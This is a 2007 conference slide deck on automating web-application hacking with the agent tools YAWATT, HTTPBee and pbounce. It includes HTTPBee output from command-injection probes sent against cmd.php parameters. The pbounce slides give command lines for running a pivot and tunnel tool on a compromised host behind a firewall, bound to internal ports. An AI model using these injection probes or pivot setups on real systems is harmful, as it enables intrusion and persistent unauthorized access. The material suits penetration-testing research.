Hacking techniques automation
description
Transcript of Hacking techniques automation
![Page 1: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/1.jpg)
Hacking techniques automation
Yarochkin Fyodor.
Guard-Info
Meder KydyralievO0o.nu sec.Singapore
![Page 2: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/2.jpg)
I will talk about my research interests during past year or so.. So, why automate “hacking” ?- design hacker’s personal agent- leverage time use- other uses of automation
![Page 3: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/3.jpg)
Agenda
Agents – the concept of “Hacker’s personal Assistant” and how I am going to get it working
YAWATT – concepts, knowledge base, planning Implementation - YAWATT, httpbee, pbounce Notes on distributed approach Notes on automation Hacking web applications with httpbee and
YAWATT Maintaining control of compromised hosts with
pbounce
![Page 4: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/4.jpg)
Agents
Why agents Why “Hacker personal Assistant” How our framework is to be designed
![Page 5: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/5.jpg)
Agent inner workings diagram(generic)
![Page 6: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/6.jpg)
Inter Agent framework
We have roles: Facilator Requesting agents Service Agents Meta agents (used for planning)
![Page 7: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/7.jpg)
Inter Agent framework diagram
![Page 8: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/8.jpg)
Service agents
Yawatt – web analysis, data mining HttpBee – swiss knife for web application
testing Pbounce – advanced tunneling
![Page 9: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/9.jpg)
YAWATT focus is around web applications, why?
HTTP/HTTPS services are very common and usually legimate (services that the company is usually aiming to provide)
Web applications often are complex Often programmed by non-professionals System Administrators are not programmers
and cant fix bad code.. Conclusion is..
![Page 10: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/10.jpg)
the Web applications - the largest hole to get through The code is bad
Q/A not security oriented Must get product to market ASAP
Firewalls are there – but they can’t help IDS are there – but they are blind (HTTPS) Application “firewalls” - stop limited number of
web application attacks (basic user input validation), but are useless when it comes to detection of logical vulnerabilities
![Page 11: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/11.jpg)
Requirements to the framework Automated methods and tools to test security Ability to ‘emulate’ hacker attacks (“think like
a hacker would do”) Ability to extract, store and transfer
knowledge from “expensive” security professionals (aka “hackers”) to cheap computer automation
Ability to have real-time interaction with testing process
![Page 12: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/12.jpg)
Software agents
Autonomous functionality Cooperation capabilities Learning and knowledge management
capabilities
More to the feature ‘wishlist’ Let human do what he can do faster and
“learn from human” -> knowledge transfer Deal with uncertainty in “intelligent way”
![Page 13: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/13.jpg)
YAWATT design blocks
YAWATT knowledge base - Efficient knowledge base for “testing” methods, knowledge about testing targets, infrastructure and so on – implemented as
Efficient planning abilities (work in progress)
![Page 14: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/14.jpg)
Knowledge representation in YAWATT Ontology is represented with Time, Objects
(hosts, networks, applications, urls, etc), Actions
Shall be added: beliefs (intuitive guessings)
![Page 15: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/15.jpg)
YAWATT knowledge base
Still in design process. Httpbee (working horse of yawatt, also – an agent) – talks
to KB via API Knowledge can be accessed or added via set of requests
TELL(X, Y) ASK(X) QUERY(X)
(KB operates on ‘entities’ which are objects within target network. An application, host, user, can be an ‘entity’, different entities may have different properties.
Implementation – single table is used to store ‘entities’ and their types. Separate tables are used to keep properties of different agents
![Page 16: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/16.jpg)
Planning in YAWATT
Currently yawatt agent system is designed as centralized system – httpbee instances talk to YAWATT server (which maintains KB)
P2P architecture is in TODO Agent actions can be later planned, when KB is
enriched with the data from human security analysts Inference engine/planner is at design stage
(need to think how to represent analyst knowledge and actions to be taken in general form)
![Page 17: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/17.jpg)
Details on tools of tradeYAWATT, httbee, pbounce
![Page 18: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/18.jpg)
What we want to achieve
Learning capabilities Control of software agents Intelligent data management Interesting Visualization (maybe?) Data aggregation, analysis (for reporting etc)
![Page 19: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/19.jpg)
YAWATT – one of learning methods is learning from user sessions
User sessions – collections of user’s requests and responses (url, name/value pairs, session information and selective HTTP protocol data)
Classified user session data include semantic classification of URL, parameters, responses and HTTP protocol data (server type, backend system(s) if visible, “unusual” HTTP headers detected and included)
![Page 20: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/20.jpg)
YAWATT: Automation
Application content is learnt from user sessions (data feeders: proxies, enumeration tools)
Real-time content analysis with additional verification
![Page 21: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/21.jpg)
YAWATT – ideas on raw data classification (of entities)
User session data is classified by: Semantic and functional classification of URL HTTP protocol classificators (server type,
cookies ..) Session classificators Input data classification – type, semantics Output classification (application error
detection, redirects, “bogus’ responses etc)
![Page 22: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/22.jpg)
YAWATT: real-time classification
![Page 23: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/23.jpg)
YAWATT: Testing process
Testing with HTTPBee (introduced later) Testing with YAWATT Plugins (tests)
could be executed during the collection of user session data if any of user session data triggers certain plugin
Plugins (tests) are executed on demand, when user session data is completed
![Page 24: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/24.jpg)
YAWATT: Intelligence components
Web application components (URL) classification Semantic classification for web application input
data Use of Latent Semantic Indexing Algorithm in
response analysis
In response analyzers. Use of queries to external sources, search engines Generation of target-specific bruteforce dictionaries
![Page 25: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/25.jpg)
YAWATT:Input data classification
![Page 26: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/26.jpg)
YAWATT: Use of classified user session data
![Page 27: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/27.jpg)
YAWATT Communication layer:
Originally odified version of spread toolkit used as base (www.spread.org)
Replaced with Yawatt Data Excahnge Server, running over HTTP
![Page 28: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/28.jpg)
YAWATT: architecture
![Page 29: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/29.jpg)
Arbitrary data collection (from YAWATT Database)
Aside from application vulnerabilities, other things of interest are: Email addresses, user ids that could be seen
within web content Domain names (within web pages, comments,
binary files, etc) Building ‘target-oriented’ dictionary files (used by
brute-force cracking modules)
![Page 30: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/30.jpg)
How the targeted dictionaries for brute-force attacks are generated: A statistical information extraction method is
applied: Step 1:Random similarly styled texts in the same
language as the target application content, are analyzed and the statistical occurrence of each word is calculated
Step 2:Statistical occurrence of each word within the target website is calculated
Step 3:The dictionary is produced by selecting those words which probability produced in Step 1 and Step 2 is significally different
![Page 31: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/31.jpg)
YAWATT: (hands on)
You will need linux, burp proxy, YAWATT tarball.
Start YAWATT Collector, start burp proxy with YAWATT plugin loaded. Start browsing
If you see stuff “running” you can try ..
![Page 32: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/32.jpg)
You can try to add your own plugin: Add your plugin code on the fly (attack
automation plugins via subscription mechanism, classification plugins etc): Can’t be simpler:
![Page 33: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/33.jpg)
YAWATT: visualization (work in progress) (show actual application)
![Page 34: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/34.jpg)
Introducing HTTPBee
![Page 35: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/35.jpg)
HTTPBee
High-performance threaded HTTP service testing tool. Designed as ‘swiss-army-knife’ for HTTP services hacking
Scriptable via LUA scripting engine API for sophisticated data analysis Command line (or daemon mode, later) Can be integrated with YAWATT (via scripts,
or LUA API later)
![Page 36: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/36.jpg)
HTTPBee: scripting Engine
Simple High-performance provided by HTTPBee
code
![Page 37: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/37.jpg)
HTTPBee API
![Page 38: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/38.jpg)
HTTPBee API
![Page 39: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/39.jpg)
HTTPBee output
[+] HttpBee 0.1-pre. (http://o0o.nu)Started at 2007-03-08 01:20 CSTStarting up 3 scanning threads...GET /cmd.php?command=;echo+GOTTALOVETHEEXEC; HTTP/1.0GET /cmd.php?foo=;echo+GOTTALOVETHEEXEC; HTTP/1.0GET /cmd.php?include=;echo+GOTTALOVETHEEXEC; HTTP/1.0GET /cmd.php?file_inc=;echo+GOTTALOVETHEEXEC; HTTP/1.0GET /cmd.php?har=;echo+GOTTALOVETHEEXEC; HTTP/1.0GET /cmd.php?del=;echo+GOTTALOVETHEEXEC; HTTP/1.0GET /cmd.php?cmd=;echo+GOTTALOVETHEEXEC; HTTP/1.0GOT EXECUTION WITH REQUESTGET /cmd.php?command=;echo+GOTTALOVETHEEXEC;
Script execution completedall is doneWating for scanning process to stop................................................................................................................................................................................................................................................................done at 2007-03-08 01:20 CST.Total execution time 12 seconds.
![Page 40: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/40.jpg)
Experimenting with HTTPBee
You can try to design your own scripting modules
Analyst knowledge can be represented in form of such scripts
![Page 41: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/41.jpg)
Introducing pbounceCo-work with Meder Kydyraliev
![Page 42: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/42.jpg)
What is pbounce
Advanced port and connection forwarding tool.
Connection encapsulation and multiplexing on demand through a single connection
Pivot mode allows to “pierce” firewalls that allow outgoing connections only.
Small binary footprint. Extremely portable (windows, unixes, binaries packaged)
Remote command execution possibilities
![Page 43: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/43.jpg)
Pbounce – sample architecture Two instances of pbounce are required. LiMo instance should run on your machine PiMo (pivoting mode) instance should run on
compromised system LiMo is the “control center” for PiMo pbounce
instances.
![Page 44: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/44.jpg)
PBounce – sample architecture
Pbounce infrastructure setupInternal system
192.168.0.10LAN
Run pbounce in PiMo as:Pbounce –P –R XXX.XXX.XXX.XXX –r 10000firewall
internet
Your machine
Run pbounce in LiMo as:Pbounce –L 5000 –r 10000
![Page 45: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/45.jpg)
PBounce – binding port
Connect to port 5000 on your machine and issue command:
BIND 192.168.0.10 T 22 1022
Port 1022 on your machine will be associated
With port 22 on 192.168.0.10
![Page 46: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/46.jpg)
PBounce – other features
If LiMo node dies, PiMo instance will continuesly try to establish connection
PiMo instance may be scripted via external script to obtain LiMo address from external source (i.e. post to a newsgroup)
Primitive data scrambling with –k [key] is supported (this is not encryption. But obfuscation!)
Pbounce supports HTTP proxy with CONNECT method availability (-F proxyIP, -f proxyport)
![Page 47: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/47.jpg)
Code availability:
PBounce http://o0o.nu/~meder/index.php?pg=pbounce
HTTPBee http://o0o.nu/httpbee
YAWATT http://o0o.nu/YAWATT
![Page 48: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/48.jpg)
Other research interests
SS7 security Working on scanning tools Ruby binding for SCTP
![Page 49: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/49.jpg)
Questions and Answers
Sample questions, pick one: ;---------) Why another hacking tool? Can you do X too..? Can X be integrated too ..? This presentation is boring crap, any
excuse ..?
![Page 50: Hacking techniques automation](https://reader035.fdocuments.net/reader035/viewer/2022081519/56814624550346895db32f57/html5/thumbnails/50.jpg)
Thanks
Thanks for your patience Send me email if you like the stuff